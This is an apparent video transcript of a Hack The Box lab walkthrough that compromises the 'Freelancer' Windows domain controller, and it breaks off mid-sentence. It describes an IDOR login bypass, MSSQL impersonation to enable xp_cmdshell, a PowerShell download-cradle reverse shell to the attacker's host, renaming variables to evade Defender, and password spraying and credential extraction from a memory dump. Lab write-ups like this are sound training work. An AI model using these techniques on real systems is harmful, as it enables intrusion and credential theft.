What's going on YouTube? This is Ipsec. I'm doing Freelancer from HackTheBox, which is a nice hard machine. It starts out with the Django web app that has a business logic vulnerability within account registration. When anyone registers an account, they can't log in because it needs to be validated. However, if they use the forgot password functionality and successfully reset their password, that validated flag will be set and they can log into the app. Once in, there's a magic link that lets people log in by scanning a QR code on their mobile device. This has a IDOR vulnerability and lets us impersonate any user. So we impersonate the admin, and that also lets us into the Django Admin panel that has a way for us to execute Microsoft SQL queries. We do a lot of enumeration and discover that we can impersonate the SA user, which enables us to re-enable the XP-CMD shell and get a reverse shell on the box. From there, we do some memory analysis on a dump file that lets us retrieve passwords, use those passwords to log into another account, which can recover data from the AD recycle bin, and then that will enable us eventually to exploit a SeBackup privilege in order to extract passwords from the box and log in as administrator. There's an unintended path with constrained delegation, so a lot to be said. Let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, -vv for double verbose. This is going to give us the TTL, OA output all formats, put in the nmap directory and call it Freelancer, and then the IP address of 10.10.11.5. This can take some time to run, so I've already ran it. Looking at the results, we have 12 ports open. The first one is DNS on port 53, and the banner tells us it's simple DNS plus, which is the default banner on a Windows domain controller. So I always look down at nmap and confirm, yes, Active Directory is installed, so we're dealing with DC. We also have HTTP on port 80, and it's running Nginx, which is a bit odd. I didn't even know Nginx supported Windows. I look at the TTL because I expected this to be like 62, considering if it was a Linux box, then it's probably a VM on this, so that would be a 64 TTL. It hits Windows, 63 hits us, 62. But it's 127, so Nginx is running on Windows, which is bizarre. I'm going to Google Nginx Windows just to confirm it actually supports it, and it looks like it does. So that is new to me. We have Nginx running on Windows. I'm going to guess it's probably like PHP or something like that, because if it was an ASP website or .NET or something, it would definitely be on IIS. It being on Nginx is a weird curveball. Looking at the other ports, it's all just relative to Active Directory. We have Kerberos, LDAP, SMB, so nothing too interesting there. I do want to add the hostname freelancer.hdb to my host file because it looks like the website is redirecting to it. So we'll do sudo v etc host, and then we can add 10.10.11.5 freelancer.hdb, save that. And looking down at the bottom, we do have a clock skew of 5 hours. So if we do anything Kerberos later on, we'll know to like sync our clock to the server with, I think, NTPQ to set it. So we have the same time and we don't fail any like Kerberos checks due to time. So we don't really have that much to go on. We could start with the web server, but the web server is generally open-ended. We can spend a lot of time on recon there. So when I go against a domain controller, I always like starting with SMB because I just want to list open shares. So I'm going to do nxc smb 10.10.11. Was it 4 or 5? I think 5, right? And then -- shares. And this is just going to list open shares if there's any, or if we can authenticate to it. We have list index out of range. So the next thing we're going to do is specify the user guest and a blank password. And we'll see if guest login is enabled. And then I also like just seeing the behavior when you give it a invalid account. For some reason, guest and invalid account is sometimes different on Windows. I don't know exactly why, but we can't list any shares. So I'm going to give up on SMB right now. And I guess the quickest thing we could do is a zone transfer with DNS, because we do see DNS listing on TCP 53, which does support zone transfers. I don't think it's enabled by default on Windows, but it literally takes a second to check. So we're going to do a dig at and then the DNS server, and then you have to give it the domain name. So we'll do freelancer.hdb and then AXFR to do a zone transfer, and we get a denied or a transfer failed. So there is no zone transfers. We can't just dump every subdomain. We can get rid of that AXFR just to make sure we can do a DNS lookup, and that does succeed. So now that we've done SMB and DNS, let's go take a look at the website. So we're going to do HTTP freelancer.hdb, and it looks like we get a website. So the very first thing I always look at is try to identify the technology that's building the website. We could use Wappalyzer, and actually that detected Django right away. I don't know exactly how Wappalyzer is detecting Django, but it is discovering it. I'm doing a search on the page source to see if it says Django. It doesn't. We could look at the cookies that are set, because a lot of times various frameworks set a unique cookie, like Express, I think, is connect.sid. Flask is just plain out session. And what's another one? Like Laravel is Laravel_session. Django is going to be session ID, but we don't have a cookie yet, so that's not how it identified it. Really not sure there. Django does have a /admin normally. So we can go there, and we do see this does look like a Django admin portal. And if we look at the cookie now, we have CSRF token. So this is most likely going to be Django. Another way you could identify frameworks sometimes is a 404 page. So if we just do a page not found, this looks like a custom 404, so you can't really tell there. But if you want to look more at cookies, you can just get it from playing with a lot of just technologies, and eventually you memorize it. Or you can go to ChatGPT and then just ask questions, right? So we're here. We could just say, what is the default cookie name for CSRF with, let's do Express.js first, right? And this is probably going to tell us, I think it's like probably XSRF token, I think it uses. Let's see. CSRF middleware, the default is _CSRF. So we can say, what about, let's do Flask and see what the default cookie there is for CSRF token. I think it has a dash or an underscore. There we go, CSRF underscore token. And then let's just ask it Django, right? We want to make sure it's just CSRF token. And we'll see what ChatGPT says. There we go, just CSRF token. So this is one way you can kind of just play with various things to identify the fingerprints, right? We could also ask it like, what is the default session ID cookie name for Django? And this will probably tell us it's session ID, and then we'll ask it Flask and it'll tell us it's session, right? So these are the types of things I play with when I'm just trying to fingerprint a web server, right? So this is a really powerful way to do it. So there we go. The thing is, you can't always trust it. Sometimes it gets the answer wrong, but 9 times out of 10, it's relatively good. So we know we're dealing with a Django website. It doesn't really help us all that much. We just know there is a /admin. We could try the registration. So let's go to register, and then let's create the account ipsec, then root at ipsec.rocks, first name, last name, address. And then what are these next things? Security questions. I feel like this is trying to social engineer me and put my security questions out there in the public. We'll just do ipsec for everything. And then password, we'll do the super secret password 1 with an exclamation point at the end, accept the terms and register. And then let's try logging into the app to see if it lets us do anything. So we'll do ipsec password 1 exclamation point. The account is not activated and cannot be authed. So we have to find some way to activate it. Probably send us email, but on HackTheBox, we don't really have email because there's no DNS or things like that. There is a forgot password, so we'll click that and see if it lets us do this without email. And it's just asking for the security questions. So let's try this. I'm going to do ipsec for everything and then hit enter. And it wants us to reset the password. So let's set it to password 1. And there is a chance when it resets the password, it also like changes the flag of if someone's been like validated, right? So this would be a business logic vulnerability. Generally, I don't see it that often anymore because a lot of websites have moved away from security questions for good reasons. But when they do ask them, this is one of those vulnerabilities for them. So now we're logged into the application. We could try going back over to /admin to see if it lets us in. We go to /admin, we can try ipsec and then password 1 exclamation point. And no, it does not. So let's take a look at what we can do. We can post a new job. If we go there, we have a lot of forms. Maybe this could be like cross-site scripting. Let's go to manage job. Nothing there. All applicants. So I'm guessing if we post a job, maybe applicants will show up. we go to QR code, it says use your mobile phone to scan this QR code to log into your account without using any type of credentials. So let's download this QR code and see exactly what it looks like. So let's save it to home, HTTP, Freelancer, freelancer.php, under qr.png. Home, HTTP, home, IPsec, HTTP, Freelancer, then qr.png. Save that. And we can use a program called zbar_image to convert QR codes, right? That's the whole purpose of this. There's probably a web browser extension you could also install that would automatically do it, but I normally just use the command line. And doing this, we have a OTP code. So if we copy this, and then let's go to a incognito window real quick, we'll paste it, and it logs us in. Awesome. So let's see what that base 64 in this is, because it may have like a IDOR vulnerability, right? If we echo this and then base 64-D, we can see, I typoed echo there. It's just 10,010. So this may be like a user ID. If there's a way to figure out our user ID here, we could confirm it. Let's see if we do my profile. Does not say it. Contact. No. Let's see. There's a blog. Normally with blogs, they have blog authors, and you can normally find them that way. So let's see this. If we click on Krista Watterson, she is 5. I'm going to do 10,010. That is going to be me. So we have a way to enumerate valid IDs. So if we go to 1, we get a 404. Let's try 2. We have admin and John Holland. So this is probably going to be what we want to play with, right? So let's do a echo 2, base 64, and then echo again. That last echo just makes it super easy to copy. Whenever I do base 64, I like just putting that there. We have mgo for 2. We probably have to do a -n, right? Because that 2 has a line break in it. So there we go. mg ==. So let's go and generate another QR code, because they're only good for 5 minutes, it says, and see if we have an IDOR vulnerability. So accounts profile, let's go to QR code. We're going to save this image. I'll save it back to QR. Then let's do a zbar again. And then mg ==. We'll delete the base 64 and put that. So go here. And I'm going to say capital M, G ==. And we get logged in. Awesome. So the vulnerability here is this one-time pad. I'm guessing that's what it's called because we have OTP, is valid for anyone, right? So by default, it just puts our ID here, and this gives us a session with that user. But there's no checking that we generated this QR, I guess. There should be probably some type of signing here, so we can't just change this variable. But yeah, we just put the ID of 2 with the little secret one-time pad, and it lets us just take the session of administrator. So let's see exactly how does this next piece work. We don't have anything new on this side. If we go to all applicants, manage jobs, nothing there. Let's check the /admin. And we do just log straight into Django because it's using the same exact session for the user as it is in admin. And Django it's kind of like a, I don't know exactly how to describe it quickly, a super featureful Flask. So most people watching this are going to be familiar with Flask. Flask is just a bare bone like web server, right? Doesn't really give you that much. Django gives you a bunch of default functionality for like the admin panel, how to handle users, how to handle login. It's like Laravel to PHP, right? It just gives you all the backend you need to make a website. So we have the developer tool SQL terminal installed. So if we go here, we can just run straight queries. So if I do, let's say like show tables, see if we can list the tables on this. We don't have a stored procedural for show because this looks like it's going to be a Microsoft SQL server. So that would probably be like select add at version, I want to say is how how you enumerate that. And there we go. We have Microsoft SQL Server 2019. So we can run MSSQL commands, right? Is it like select system_user? Is that how do we do user? I forget exactly with this. There we go. We are the freelance web app user on this database. The first thing I generally do is like an exec xpcmd tree. Who am I to see if we could run commands on it? We could not find the stored procedure for that. We could try xp directory to see if we can list files. And then we can just list, let's say, slash. What do we just specify C:? It looks like the command works, but we didn't get any data. I'm not sure why. But generally, my first bet is, can we actually make a request back to us? Because with Windows, if you give it a UNC path, it'll attempt a NTLM authentication. So I'm just going to do a netcat real quick to see if it connects back. And then if it does, then we'll run responder, right? So we'll do execute. There we go. We get an SMB header. So let's run responder. So we'll do responder I ton 0. Do another connection. And there we go. We have the NTLM hash. Now, normally I would try cracking this. It's not going to give us anything, so I'm not going to waste time and send this over to the Kraken and try to crack. But normally you just run hashcat against this and see if you can get anything. The username doesn't end with a $, so there's a good chance. If this did end with a $, I probably wouldn't be trying to crack it because it's most likely a group managed service account with a super unique password. But that is the first thing I generally do on MSSQL, but we don't have that. So I guess the next thing I would do is try to enumerate the local tables and dump the users table to see if there's password hashes, right? So let's Google MSSQL. Let's do hack tricks. Pen testing MSSQL. And then we just kind of want to see how to dump tables, right? This is MSSQL client. There we go. So version, username. We could look at various databases on the box. So if we run this command, let's see, execute. Here's all the databases. We do have the one we knew. Let's see, select star from database name, information schema tables. Does this work? Let's paste this. Whoops, there we go. And we'll copy this, paste, execute, and we have all the tables. So Django migrations, custom user, article, job, OTP token, employer, freelancer, comments, jobs, Django stuff. So I'm going to do probably select star from freelancer custom user. So let's do that. And I'm going to put 2 dashes there just to comment that so I have it if I want it again. So select star from, then we can run this command, execute, and then we get a bunch of hashes and usernames. So dump this and also just send it over to hashcat to see if it could crack, but doesn't really buy us anything. So I'll save the 5 minutes and we'll refrain from doing that. So the next thing we would do, we have failed to crack NTLM. We failed to crack the hashes of the user. We want to just run commands on this box, right? And we couldn't do xpcmd shell because we didn't have that enabled. But there is a potential way to enable it. So let's see. It's like, there we go. Here it is. We do a sp configure, show advanced options 1, reconfigure, then xpcmd shell. So let's go ahead and try this. So we'll do exec. I think we have to do exec first. And then reconfigure. And then we run the next one, which is this. And I think we do exec. I'm not positive by that. If it fails with a way we don't expect, then we'll remove exec. So we'll do execute. And user does not have permission. So we can't re-enable xpcmd shell. So let's see, what else can we do on this? So we go over here, looking down. Let's see, xp directory, we already ran that. We could try potentially writing to various directories, but it's a Python application, so I'm not really going to do that. If we're in like PHP, then we could just drop a PHP shell potentially and get it that way. Looking at this, we have a query that potentially allows us to impersonate users. So let's run this one. So if we go back to site administration, paste this in, Man, I really hate how those line numbers get in the way. We can execute, and this is telling us we can impersonate the SA user. Let's see, how can we get everything? If I just delete this where statement, what happens? Execute. Maybe it's got too many rows. Limit 1. Wait, does MSSQL not have limit? That is bizarre. Let's see. Select star limit 1020 with MySQL, where row number is between. Okay. Let's just try this. So we'll paste that. We'll row number between, we'll do 1 and 5. Invalid column. I am honestly at a loss right here for enumerating this. Let's see. So that's doing joins. I wonder if we just do a select star from this. Okay, there we go. So let's see. The granny principal ID and then grantor. So this is who can impersonate. This is to what? And if we look, let's see. I bet one of these is just going to be, there's the impersonate privilege. I bet if we looked, grantee principal ID is our guy, the SQL service. What was that command? So we did that. Let's dump all the principals. So we're right here on impersonate 267. So let's do another select star from this. I'm not sure why the join didn't work before. That's weird. But on this query, execute. That's not working. I wonder if this table has too many rows. It's a bit odd. Let's just try selecting name. Does this work? Okay. So maybe we have too many columns for Django to show in its error. I want to say we wanted principal ID because that was what it was called there. Okay. So this is getting all the principal IDs. We have freelance web app users 267 and SA is 1. So this does show us that our user does indeed, in fact, have the impersonate privilege, right? So 267, that's us. We can impersonate SA. So we don't need these queries. Let's get rid of that. And then we want to impersonate a user. If we go back here, let's see, we have execute as. So we can execute as that CA user. And then we want to do, let's see. I wonder if we can just do select. I don't know how to, if we do system user, I think that would have been the same anyway, right? Execute, we got SA. If we comment that out, okay, yeah. So we do change who we are. So what we can do is take this command again, and we're going to execute as, then we'll re-enable xpcmd shell. We got no results. So now let's do exec xpcmd shell, who am I, execute command, and now we can run commands on this box. So what we want to do is make sure we can run PowerShell. So I'll do PowerShell, who am I? Same output, so this is good. Let us now try to get a reverse shell. So I'm going to make dir dub, and then let's copy user share nashang PowerShell, invoke PowerShell, right? Is it just shells? Invoke PowerShell TCP, one line PS1, and I'll call it rev.ps1. Okay. So let's go and edit this file, uncomment those or delete those. There we go. And we want to put our IP address here. So we'll do 10.10.14.8. And then for port, we want 9001. So we can do NC LVNP 9001. And since it's Windows, I like using RLWrap. That gives me the up and down arrow. So the last thing I like doing whenever I do shells on Windows, I always like using some type of web cradle. And the reason why I like doing this is mainly for if there's antivirus. So we're doing IEX new object net.web client download string HTTP 10.10.14.8. We're going to port 8000 rev.ps1. And this tells us it's antivirus because normally antivirus won't flag on this web cradle, but it may flag on the in-packet reverse shell. So if we see the web server hit our web server, but we don't get a shell, it's probably antivirus, right? So the next thing we need to do is convert this web cradle to base 64. So a cat cradle, iconvert -t, UTF, 16 little endian. This is just how Windows likes it. And then base 64 W0. And we can copy this string. And then stand up a web server. And now we can go back here and we can say PowerShell-ENC for encoded command, and then paste the string. It looks like something reverted the enabling XPCMD shell. So let's get rid of that. Then we can comment this again. And then run this. Execute. It's taking time. Hasn't hit us yet. Execute. Create process failed. That's odd. Did not like this base 64. So something's causing the create process to fail. I don't know exactly what. Oh, it hit. Still don't have a shell. And preparing module. This script has been blocked. So this is definitely going to be antivirus is blocking it. Okay. So what we want to do is change this up. So let's go to rev.ps1. And in previous videos, we found out if we just rename all the variables and delete this piece, it'll bypass basic defender. So let's do that. I'm going to make sure I didn't make any edits there. And I'm going to use search and replace to replace variable names. We're going to replace client with, let's do ipsec. And then let's replace stream with ip, I guess. Let's see. We can replace $bytes with, we need to do $bytes. We'll do data. Okay. $data. Call it real? I don't know. I'm learning out of names. This is one of my least favorite parts. Sendback, this has actually two. We got a sendback and a sendback2 right here. So I always start with sendback2 first, and we can call this one, we'll call it SB2. And then sendback, we need to do $. I'll call this the sender. Again, all we're doing is changing the signature of this because I don't know exactly what PowerShell flags, but it's got a few strings in this that it just detects, right? I think we want to delete this. And I don't know if I did send byte. We'll do %s send byte with send b. Hopefully I did not break the script. So we'll save that, run this again, and then I probably need to run this sp configure again to re-enable xpcmd shell. And then we'll run the same thing, execute. Create process failed. I guess it really doesn't like this base 64. If I spam click, does that work again? No. Let's change up a web cradle. So we don't have to do IEX. We can do, well, we need IEX because this is invoke expression. That's going to be what runs it. But we don't need this new object thing. We could change it to invoke web request. And then you do use basic parsing, then the URL. So HTTP 10.10.14.8 port 8000 rev.ps1. Maybe this will be better because it's just different. Let's now convert this or run this command. Copy, paste, exec. We need to start the server. Run it. Something is, I wonder if it's because we don't have space after that. I bet that was it. We didn't do dash space apparently, so I think that's what was causing it to break. But we did get a hit and a shell comes back. We do enter, we can see the PS option. We do who am I? We are a Freelancer SQL service. Now the first thing I always check is a who am I /all and try to identify if we have SE impersonate or any dangerous privileges. Does not look like we do. So we also have Kerberos support for dynamic access control on this device has been disabled. I don't know if that's normal or not. It's a weird error message or a weird message. So let's do a dir and we just have, I guess we're in system 32. Yep. So you can do cd / dir, dir apps, dir engine x. Let's go HTML, index, let's see, sites enabled, freelancer.config or conf. See, it's going to localhost port 8000 and it goes to c:\apps freelancer static. So can we go in this directory? Looks like we can. Not. So I don't think we have permission to go into Freelancer. We're probably getting access denied right here on CD apps. Do pwd. Nope, we just don't have any permission once we get in here. So what else can we do? Since we know Defender's on the box, WinPEAS isn't going to just work on it. I guess we could try an SMB server and running WinPEAS from SMB. I actually don't know if Defender's going to flag that. But I know Defender won't let us run it on like the box itself. So we could try like CD program data. We go in www. Let's do cp opt peas, WinPEAS. We can start the web server back up. And then curl HTTP 10.10.14.8 8000 -o. We'll call it peas.exe. This should download. If we try to execute it, thinks about it, is it going to come back? I really don't think it will. Do a dir. It does not execute. I think eventually the file will just disappear, but Defender is blocking us from running this. At least that's what my assumption. Oh, there we go. It's gone. So I wonder if we execute it right away. Does that change anything? I don't think it does. But I don't know. I honestly don't know what's going to happen if we try to run it from an SMB share. So let's try that. The first thing we do is set up impacket. So we'll do sudo, I think it's impacket-smb server. There we go. Then we want to do smb2 support. And I think it's the share name and the directory. Let's do -h real quick because I don't fully remember this one. So we want to do the share name and then the path. So to do share name of files and the path, we'll just do pwd. And then we can say new PS drive, PS provider, file system. We'll give it the drive name of IPsec And the root is going to be at 10.10.14.8. And we said /files. And we see it trying to connect. Looks like the user connected successfully, cd ipsec. Does not look like it. Let's see. Is there a way to get like an error message to dev like that? There we go. So we just directed standard error to out, and it says this doesn't exist or is not a folder. Huh. Net use 10.10.14.8. Did we say files was the share? We did. Share name and path. C colon. That is odd. I don't know why this mount isn't working. SMB client -L 127.0.0.1. Let's see. PS provider name root. I wonder if we need to put a credential. Because sometimes Windows blocks it with like an anonymous account, but it's not what this looks like. See, if I do this now, it just mounted. This is one of the most bizarre things I've seen. Okay, let's set a credential real quick. Dash username, ipsec, dash password. We'll do please subscribe. Okay, so now we want to add the password here. So we can say pass is equal to please subscribe. Like that. And then convert to secure string as plain text force. And now we can say cred is equal to new object, system management automation, PS credential. And then the username was ipsec and the password is this. So now we have a credential object. This shell is really wonky that I can't just see everything. New PS drive. Do that. And then dash credential cred. I want to do name. I'll go to exfil. And it still looks like it's erroring. See, net use C colon 10.10.14.8 files ipsec. Is it net use with username? I think it's like /user colon. Let's see. Net use user. Then please subscribe. Oh my God, I think we finally got it. Sweet, we're finally mounted. I don't know why I screwed up with my PowerShell command, but this is why it always is helpful to know multiple ways to do things. So running WinPEAS off of a SMB share, let's see if it works. It's taking longer, but I don't know if that means it's working or it's just downloading to a temporary location and then Defender is going to flag it. this looks promising. So I'm going to pause the video and we'll resume whenever this command finishes, because honestly, I don't know what's going on right now. Okay, so unfortunately that did not work either. So we're just left the hard way of manually enumerating this box. If we do who am I, we are SQL service. So we could go into the users. I think we're in program data right now. So let's go cd / cd users, and we could go into our directory. So let's do cd SQL service. And then we can manually look at like the desktop to see if there's anything here. You can go in downloads, and then we can see the SQL Express installation. So we can go into this directory, and then notice there is a configuration file. So if we look at this, if we do a type on it, we can get a SQL service password. Now, I really don't like the just manually searching the directory. What we could have done is like a get child item from this directory. So we're going to get every single file in here and go into it and read it. We're going to specify recurse. So we go into directories, and then the error action, we're going to do silently continue. And then we just want to specify what extensions we want, because we don't want to do a get child item of like exes and things like that. So we could say like any, let's do YAML, PowerShell, and CFG. So we're going to get every, pretty much cat and all these files is what we're doing. And then we can say select string of pass. And this shows us this file has this. So how it worked is go into all the configs, grep for the word pass, and this is case insensitive, and it shows us that SQL configuration. So we have I love Aaron Yeager. So let's go back and do a type to look at the user here. So cd, and then downloads SQL type this. If you did a Google on this file, it's just for a silent install of Microsoft SQL. So you put this file with the configuration you want, you tell it to install, it reads it, and doesn't ask you for any prompts. So we have the password for the SQL service user. We could now do like netexec smb 10.10.11 5-u. What was it? SQL _ service. Let's just copy and paste this. -p, put the password in quotes. And if we have authentication successful, we don't. SQL SVC. So maybe the password's been changed since that. I expected a success there. We could try the temporary password as well to see if this works. So we can say temporary password, and no. So I'm going to just do passwords.txt. Let's put that there. And then we also want to grab the other one. There it is. Okay, so we got the passwords there. We need to get a list of users on the box. We could just do net user, but it doesn't copy and paste well because it's like that. We could just also do get AD user filter star. And then do select SAM account name. And now we have a list of all the users. So we can grab this, go over here, vusers.txt. Wrong clipboard. There we go. And now we can go back to our SQL map, or not SQL map, netexec, and say user.txt, p passwords.txt, and do a big spray. And I'm also going to say continue on success, because by default, netexec is going to stop as soon as it has a successful login. I want to keep going. So we have one. We have mikasaAckerman with I love Aaron Yeager. But let's see if there is anything else. So I'm going to pause the video and we'll let this run because it's got to go through all the users twice because we gave it 2 passwords. Okay, now that that's done, we can see we only have that one user. So we can go up. Eventually, we'll see one of those passwords of Aaron Yeager. But if you didn't want to look at the output, netexec also does have the database that not many people really use that much. If we do NxcDb, we can go in the database, and then we want to set the protocol to SMB. And then if we do creds, we can dump it that way. And then you can also specify the cred with the -ID. So if you do, -ID1, it'll automatically use this one, right? Then we can do --shares. So this is another way of just using netexec. It doesn't say pwned, so we can't just get like a psexec shell. We could try WinRM, but this is not going to work because every protocol has a different credential ID, unfortunately. So we could just do -u, mikasaAckerman, and -p. We'll copy and paste this one, and hopefully we type it correctly. But looks like WinRM does not work. I'm just going to copy and paste this in case I made a typo on the username because I am known to do that. That's why I like the whole ID field because it just saves time from copying and pasting. So does not work. But we can still get a shell with run as, right? We've shown that tool a few times. So let's go to Google, run as CS, GitHub, and we'll download this. And thankfully, this one does not get flagged by Defender. So we can just run this straight on the box. So we'll download this. Let's save it to dub. Okay. And then let's see, pwd. We want to go into program data. That's just where I like to extract things often. Let's see. We want to go in here. Let's do unzip run as. And we already have our SMB server running, so we can just do a CP. So z:\run as cs.exe. We probably want to make sure this is case sensitive because it is an SMB server on Linux. I don't know if that is case sensitive, but there we go. We're copying run as over to our box. We can do rl wrap and c lvnp 9001. And when this finishes copying, we'll execute it. And I always like just copying the binary down to the server and then running it there because if you try to run it off the share, just weird things happen because it's like high latency and things like that. I wouldn't use like mpacket for that. If I was executing files off a share, I would actually edit the like Samba configuration and just use the SMB server that's built into Linux because it's a bit more stable. But let's do run as cs.exe. And then we want to get the username and password. So we'll do Mikasa. And I love Aaron Yeager. I wonder if the other password can be attack on Titan references. So we'll do cmd shell reverse 1010 14.8 9001. And this should get the share. If this didn't work, if we're on like a Windows client, I would specify the domain of freelancer.hdb, but you don't have to specify the domain when you're on the domain controller because every account is pretty much a local account, right? We could have also got a PowerShell reverse shell, but I think cmd shell will be fine. So if we do whoami/all, no extra real privilege. If we do whoami Mikasa, let's go into her home directory. So let's go to this directory. Is there anything in desktop? We got a few files. So let's go desktop, type mail.txt. And it looks like they are troubleshooting a blue screen of death issue. So they have a 7-zip memory, which is about 300 megs. So let's just copy memory.7zip over to our SMB share. Shoot. Well, net use, let's do y:10.10.14.8/user ipsec, and then the password was what? Just please subscribe. And we need to specify /files. The handle is invalid. Let's say Xville. I wonder if that error is because we already have it mounted on one account. I think Windows is like finicky when you have the same share mounted multiple times. Not sure why. So that's why I just changed it to Y. We can copy the memory dump here. Or that's why I changed the share name from files to Xville, because on this session, it was mounted as files and Windows just didn't like that. So it's going to take a little while to copy this. If we do a cd smb or cd www, that's where we mounted it. du-hs, memory, it's 53 megs right now, 56. Keep in mind, this is a 300 meg file. So I'm going to pause the video, probably take 2 minutes to copy this file, and then we can start beginning the analysis. Okay, the file has been downloaded. So if I do a du, we see it is 280 megs. So let's go and make a directory. I'm going to call this memory, I guess. And we'll go in here and move the file out of www here, because I don't want to leave that just on my web server, because anyone that accesses the web server, if I have indexing on, may be able to download it, and memory dumps are sensitive. So let's just 7-zip unextract this. And then once we have the memory dump, we're going to use a tool called MemProcFs. When I originally did this box, I spent a lot of time with Volatility 3, and I just couldn't get everything working the way I wanted it to. The MemProcFs did seem to work well, so that's the way we're going to be showing in this video. So let's go ahead and download MemProcFs. It's off of GitHub, and we can just get the release. And then there's going to be an issue with PyPyKatz, I believe, because the latest version wants Python 3.10, and I have Python 3.9 on this box, so we're going to have to downgrade to an older version of PyPyKatz. And I don't think that will cause an issue. So I'm going to download the x64 copy of this. So we'll do a wget. And then let's do a tar xvf, the memproc. Okay. So now we have the memproc system. I'm going to delete the archive so we can rm that. And then if we want to mount something, let's just do, we'll just mount it to /mount, I guess. We can do sudo /memprocfs. The device, we're going to give it the dump file, so memory.dump. And then the mount path, I'll give it /mount. And then we're going to, I don't think we have to specify forensic, or do we? Mount point is not empty. Make dir /mount /mem. Sudo. We'll do /mount mem. There we go. If we go into mount mem, I will have to do sudo su mount mem. We have the dump file as like a file system. So if we went to like PID, we could see all the PIDs here. Let's just go to, let's do 1308. And then we can cat win cmd line. And we can see this is a service host process, local service like that. We can probably just do cat */win-cmd line.txt and get all the files. Maybe for I in ls *win cmd line.txt. Do cat I. Is that going to do it better? We can also put an echo here. There we go. We can also say echo -n I. Like that. So now we got the file name. This is going to be PID 700 is dcom. lsas is PID 584. So you can navigate processes this way. So if we go into 584, we can see other things of LSASS. Like if we wanted to view the memory, we might go in memmap, I guess. Don't know exactly how to do this. What's under files, handles, modules, VADs, but this is one thing. There is plugins, and that's what we're supposed to do. So if we went into Py, let's go reg secrets. It says we have to install things. So we have to install the plugins. And to do that, we just drop the plugins directory into plugins. So I'm going to go back to mount. We can close this. And I will do a git clone on this. And then if we go in files, plugins, we got PyPyKatz and reg secrets. So I'm going to move those to just the plugins directory. So now in plugins, we do have PyPyKatz and reg secrets, but PyPyKatz is not installed on a box. So if we try this mount again, where is the mount command? There it is. cd-mem. Then we go in Py. We do reg secrets again. There's an import error because PyPyKatz can't be found. So if we just did a pip3, or I'm going to go sudo su, so we install this on root, pip3 install PyPyKatz. We just try to install it this way because I'm on Python 3.9. We get an error like this because Python 3.9 doesn't support that. So what I did was just went to PyPyKatz. Is it pip? There we go. And we can see old versions and release history. So I'm going to download 6.9. So let's do a uninstall PyPyKatz. And the correct answer is probably get this on a different VM that's running like Python 3.12 or something newer than 3.9. I really got to update my parrot. Maybe I'll do that next week. Let's see. So we'll do 0.6.9. Okay. So now I can run PyPyKatz. So if we do this mount again, I don't think it's going to work because I think there is one more file we need. Let's just try it though. cd-mem. Did I do this in the... I'm mounting in MemProcFs. Let's just do it in mem. Py. Reg secrets. Oh. And mount it installed fine, I think. If we cat sam. There we go. We got the SAM file. We could try from this logging in with this NTLM hash. So if I did a, let's do, oh, don't kill the pane. Let's try nxc smb 10.10.11.5-u administrator-h this. We get a login failure. So let's see. There is security.txt and software.txt. I don't know actually what's in software. Nothing. If we look at security.txt, we have it dumping a bunch of things out of LSA. And we got two credentials here. We got MSSQL Server password and this pwned one. So let's add this into our passwords.txt. So we can add pwned and then this MSSQL. Okay. And I'm just going to take the 2 out of there. We can say new passwords.txt. Then let's do that SMB. I'm going to say -p, new passwords, and -u is going to be our users.txt. And we also want the continue on success. There we go. So we're going to do a password spray on the new ones. And while we do that, let's see if there's any other passwords here. So looking at this, We have LSA machine account. And we got some DCC2 hashes. So these are just hash passwords of users that logged in. So let's go ahead and copy these out. So let's v hashes.txt, paste that. Let's grab this, paste that. And let's grab the final one. Paste that, save it, and then we'll cat it again so we can easily put this on our clipboard. And I'm going to go over to the Kraken, which is just another box on my network. You can use your host to crack if you want, but just don't crack in VMs because it's slow, right? So let's go into the hashcat folder, v hashes, and then I'm going to call this, I guess, freelancer.dcc2, paste them. Then we can say /hashcat, the hashes, opt, wordless, rocku.txt, and let's make sure it detects it. I guess while it's going, we can see if we got any more credentials. So I'm going to go back in the database. If I just do creds, doesn't look like we have any. I thought we would have. Let's see. So we got the SQL service. Doesn't look like we have any extra creds. Looking at hashcat, there is one that has cracked. So if we do --show, we can see Liza Kazanof is Rocku with the exclamation point. So let's copy this. And then we can go back here. Let's see, it was Lisa. Let's see, where is... Oh, there we go. It's the last one right here. So let's just try this password, rocku. And then the username is going to be LKAZANOF. I think that's it. And we also get a login failure. So let's just do a sanity check, make sure we copy and pasted things right. We have the pwn password and MySQL. And, oh, I didn't copy the whole password. It's just in chunks. This is the rest of this password. So let's add this. And then the MSSQL, it's mypasswd09. I think my brain just saw SA and thought this was like a MySQL password because we see it's MSSQL data, but no, this is part of the entire password, I think. It makes it more obvious when you look at it and both of them were the same exact length. That makes you think it's in chunks or something like that, right? So let's go ahead and redo our netexec with a password spray, see if we get anyone else. And I guess while this goes, oh, I saw one. We do have Laura199 has hit. So we could use the run as CS again to probably change the user. We may also just be able to use Evo WinRM if they have WinRM. So let's test that. I'm just going to let this logins finish. If we do creds now, we can see we do have that. Let's see, we can do NxC, WinRM-U, or we need the IP 10.10.11.5. What was the username? LORRA199-P. Pwned Laura Amasa, 1999. Let's see, LO. So does this work with SMB? No. I have a typo somewhere. Let's see, where is... Grab this. Okay. Okay, so we do have that. Let's just use evil winrm -i 10.10.11. What's the IP? 5u. This is going to be p. There we go. And the reason why I wanted to use evil winrm here instead of run SCS is because, like, whenever I can use a remote protocol like SSH or WinRM, I prefer to do that because if I stopped doing the box and then picked up at a later time, I don't have to get the shell to be able to use run SCS. I like just having the credential to log right in, right? So if we do whoami/all as Laura, let's see. We don't have any privileges. If we look at the groups, let's see. Authentication, we have this AD recycle bin group. So it looks like this user can read the Active Directory recycle bin. So let's enumerate that with get AD object, and then we can specify include deleted objects. And we're going to specify a filter of is deleted is equal to true. So this will just show us all the deleted objects. We can see there is one. It's going to be Liza Kazanof. And oddly enough, that is the one that had cracked. And we couldn't find this username in our like get AD users dump. We found L Kazanof, I think, but not this full username. So this one is deleted. It looks like we can do a restore AD object, and then identity is going to be the object GUID. And let's see, a name is in use. So let's give it a new name of Lisa.deleted. Okay, so if we do get AD user -filter star, select SAM account name. We do have Liza Kazanof right here. We could just say filter on her. Let's see. She's the last one. We have Lisa.deleted as the common name, but the SAM account name is going to be Liza Kazanof. So let's go back to our crack map exec. Let's see up here. There we go. And do the old password, which I think was Rockio, like with exclamation point, right? So if we do this, we have password expired, but we can use the SMB passwd.py from Impacket to set a new password. So the target is going to be Freelancer HTB, Liza dot, how do we spell it? Kazanof, then a colon, the password, which was rockU. We probably should put this in quotes. I always get scared when I have exclamation points in a bash command, so I always put that in single quotes. The next 